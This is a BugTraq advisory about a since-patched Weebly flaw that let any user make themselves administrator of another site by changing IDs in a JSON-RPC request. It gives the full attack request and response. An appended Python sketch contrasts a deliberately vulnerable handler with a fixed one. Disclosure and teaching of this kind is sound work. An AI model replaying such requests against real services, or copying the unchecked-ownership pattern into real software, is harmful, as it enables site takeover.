BugTraq
Hijacking any Weebly Website [Insecure Direct Object Reference Vulnerability] Apr 11 2015 08:04PM
huehuehuehue10 gmail com
Title: Hijack any website from weebly.com by just adding an administrator to their website. [Insecure Direct Object Reference Vulnerability]

=====

Weebly is a web-hosting service that allows the user to "drag-and-drop" while using their website builder. As of August 2012, Weebly hosts over 20 million sites with a monthly rate of over 1 million unique visitors. (http://en.wikipedia.org/wiki/Weebly)

Website: https://www.weebly.com

Any weebly website owner can hijack any weebly website by just inviting himself/herself through email and modifying the site ID in the HTTP request.

=====

PoC:
Video:
https://www.youtube.com/watch?v=ovM-wliY7lE

Written:

Here's the website details of the target:

weebly site: ohhyeahphfudge.weebly.com
owner_id: 47812623
site_id: 367503762921888574

=====

HTTP Request:

POST /api/JsonRPC/Editor/ HTTP/1.1
Host: www.weebly.com

{
  "jsonrpc": "2.0",
  "method": "Contributor::createMultiple",
  "params": [{
    "role": "admin",
    "email": "huehuehuehue10+weebly (at) gmail (dot) com [email concealed]",
    "message": "HiJacking Weebly websites",
    "restrict_pages": false,
    "owner_id": "47812623",
    "site_id": "367503762921888574"
  }],
  "id": 0
}

=====

HTTP Response:

HTTP/1.1 200 OK
Date: Sun, 22 Feb 2015 08:29:26

{
  "jsonrpc": "2.0",
  "id": 0,
  "method": "Contributor::createMultiple",
  "result": {
    "success": true,
    "models": [{
      "id": "invitation-596276730608950492",
      "pending": true,
      "owner_id": "47812623",
      "user_id": null,
      "site_id": "367503762921888574",
      "email": "huehuehuehue10+weebly (at) gmail (dot) com [email concealed]",
      "last_login": false,
      "role": "admin",
      "display_role": "Administrator",
      "invitation_id": "596276730608950492",
      "invitation_used": null,
      "invitation_retracted": null,
      "message": "HiJacking Weebly websites",
      "restrict_pages": false,
      "allowed_pages": [],
      "allow_publish": true,
      "allow_stats": true,
      "allow_form_entries": true,
      "allow_blog_comments": true
    }],
    "errors": []
  }
}

=====

Report Timeline:
February 22, 2015 - Bug Found by Allan Jay Dumanhug.
February 26, 2015 - Vendor Response and Vendor Fix/Patch.

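The flaw above is a classic IDOR: the server honours the owner_id and site_id sent by the client and never checks that the logged-in account actually owns that site. The Python sketch below is an added example, not code from the advisory or from Weebly; it models the reported request against a deliberately vulnerable handler and against a hardened one. The ownership table, the attacker's account and site IDs, the e-mail address and the handler names are all assumptions made for the example; only the target site_id/owner_id and the JSON-RPC body shape come from the post.

```python
import json

# Constructed ownership table for this example (not Weebly's real data model).
# The first entry is the target site quoted in the advisory; the attacker's own
# site and account IDs are made up.
SITE_OWNERS = {
    "367503762921888574": "47812623",   # victim's site, from the advisory
    "100000000000000001": "99999999",   # attacker's own site (constructed)
}

ATTACKER_USER_ID = "99999999"          # constructed attacker account


class AuthorizationError(Exception):
    """Raised when the session user may not administer the requested site."""


def build_create_multiple_request(site_id, owner_id, email, role="admin"):
    """Build the JSON-RPC body shown in the advisory with an arbitrary
    site_id/owner_id substituted in. Swapping these values is the IDOR step."""
    return json.dumps({
        "jsonrpc": "2.0",
        "method": "Contributor::createMultiple",
        "params": [{
            "role": role,
            "email": email,
            "message": "HiJacking Weebly websites",
            "restrict_pages": False,
            "owner_id": owner_id,
            "site_id": site_id,
        }],
        "id": 0,
    })


def is_authorized(session_user_id, site_id):
    """Server-side ownership check: the site must exist and belong to the
    authenticated session user. Unknown site and foreign site are treated
    alike so the endpoint cannot be used to enumerate valid site IDs."""
    owner_id = SITE_OWNERS.get(str(site_id))
    return owner_id is not None and owner_id == str(session_user_id)


def create_multiple_vulnerable(session_user_id, body):
    """Models the reported behaviour (assumed from the request/response on the
    page): owner_id and site_id are copied straight from the client params and
    the session user is never compared with the site owner."""
    req = json.loads(body)
    p = req["params"][0]
    model = {
        "site_id": p["site_id"],
        "owner_id": p["owner_id"],      # trusted from the client
        "email": p["email"],
        "role": p["role"],
        "pending": True,
    }
    return {"jsonrpc": "2.0", "id": req["id"],
            "result": {"success": True, "models": [model], "errors": []}}


def create_multiple_fixed(session_user_id, body):
    """Hardened handler: authorization is derived from the session and the
    server-side ownership record; the client-supplied owner_id is ignored."""
    req = json.loads(body)
    p = req["params"][0]
    site_id = str(p["site_id"])
    if not is_authorized(session_user_id, site_id):
        raise AuthorizationError("not authorized to manage site")
    model = {
        "site_id": site_id,
        "owner_id": SITE_OWNERS[site_id],   # from the server record, not the request
        "email": p["email"],
        "role": p["role"],
        "pending": True,
    }
    return {"jsonrpc": "2.0", "id": req["id"],
            "result": {"success": True, "models": [model], "errors": []}}


def demo():
    """Replay the advisory's request as the attacker against both handlers.
    Returns (hijack_succeeded_on_vulnerable, hijack_blocked_on_fixed)."""
    body = build_create_multiple_request(
        site_id="367503762921888574", owner_id="47812623",
        email="attacker@example.invalid")      # constructed address
    hijacked = create_multiple_vulnerable(ATTACKER_USER_ID, body)["result"]["success"]
    try:
        create_multiple_fixed(ATTACKER_USER_ID, body)
        blocked = False
    except AuthorizationError:
        blocked = True
    return hijacked, blocked


if __name__ == "__main__":
    print(demo())
```

The point of the fixed handler is that every field which decides who may act on which object (session user, site owner) is looked up on the server; the request may name a site, but it never gets to assert who owns it.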
Copyright 2010, SecurityFocus